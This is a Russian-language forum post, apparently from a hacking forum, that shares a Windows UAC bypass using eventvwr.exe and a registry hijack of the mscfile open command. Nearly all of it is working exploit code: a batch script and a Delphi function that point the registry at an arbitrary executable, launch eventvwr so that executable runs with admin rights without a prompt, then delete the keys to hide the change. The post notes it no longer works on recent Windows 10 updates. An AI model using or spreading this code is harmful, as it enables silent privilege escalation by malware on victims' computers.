- Регистрация
- 20.01.2011
- Сообщения
- 7,665
- Розыгрыши
- 0
- Реакции
- 135
Код:
@echo off
REG ADD HKCU\Software\Classes\mscfile\shell\open\command /d "D:\test\testUAC.exe" /f
eventvwr
REG DELETE HKCU\Software\Classes\mscfile /fОбход с помощью eventvwr, "D:\test\testUAC.exe" запустится с правами админа без запроса, пользователь должен состоять в группе администраторов.
Более подробно тут: _Для просмотра ссылки Войди
В последних обновлениях Windows 10 уже не работает
Код:
function RunAsAdminUACbyPass(exepath: widestring): bool;
type
_SHELLEXECUTEINFOW = record
cbSize: DWORD;
fMask: ULONG;
hWnd: HWND;
lpVerb: PWideChar;
lpFile: PWideChar;
lpParameters: PWideChar;
lpDirectory: PWideChar;
nShow: Integer;
hInstApp: HINST;
{ Optional fields }
lpIDList: Pointer;
lpClass: PWideChar;
hkeyClass: HKEY;
dwHotKey: DWORD;
hIcon: THandle;
hProcess: THandle;
end;
PShellExecuteInfoW = ^TShellExecuteInfoW;
TShellExecuteInfoW = _SHELLEXECUTEINFOW;
SHELLEXECUTEINFOW = _SHELLEXECUTEINFOW;
var
Key: HKEY; //HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
Res: Longint;
_ShellExecuteExW: function(lpExecInfo: PShellExecuteInfoW):BOOL; stdcall;
exInfo: TShellExecuteInfoW;
begin
_ShellExecuteExW:=GetProcAddress(LoadLibrary('shell32.dll'), 'ShellExecuteExW');
result:=false;
Res := RegCreateKeyExW(HKEY_CURRENT_USER,'Software\Classes\mscfile\shell\open\command',0, nil, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nil, Key, nil);
if res = 0 then
RegSetValueExW(Key, '' , 0, REG_EXPAND_SZ, PWideChar(exepath), lstrlenW(PwideChar(exepath))*2+1) else exit;
sleep(200);
FillChar(exInfo, SizeOf(exInfo), 0);
exInfo.cbSize := SizeOf(TShellExecuteInfoW);
exInfo.lpVerb := 'open';
exInfo.lpFile := 'eventvwr';
exInfo.nShow := 0;
exInfo.fMask := $00000040 or $00000400;//SEE_MASK_NOCLOSEPROCESS;
exInfo.hwnd := 0;
exInfo.lpParameters := 0;
exInfo.lpDirectory := 0;
exInfo.hInstApp := 0;
result:=_ShellExecuteExW(@exInfo); // eventvwr
sleep(200);
RegDeleteKeyW(HKEY_CURRENT_USER, 'Software\Classes\mscfile\shell\open\command'); // ГОВНОКОД
RegDeleteKeyW(HKEY_CURRENT_USER, 'Software\Classes\mscfile\shell\open'); // SHITCODE
RegDeleteKeyW(HKEY_CURRENT_USER, 'Software\Classes\mscfile\shell'); // ГОВНОКОД
RegDeleteKeyW(HKEY_CURRENT_USER, 'Software\Classes\mscfile'); // SHITCODE
RegCloseKey(Key);
end;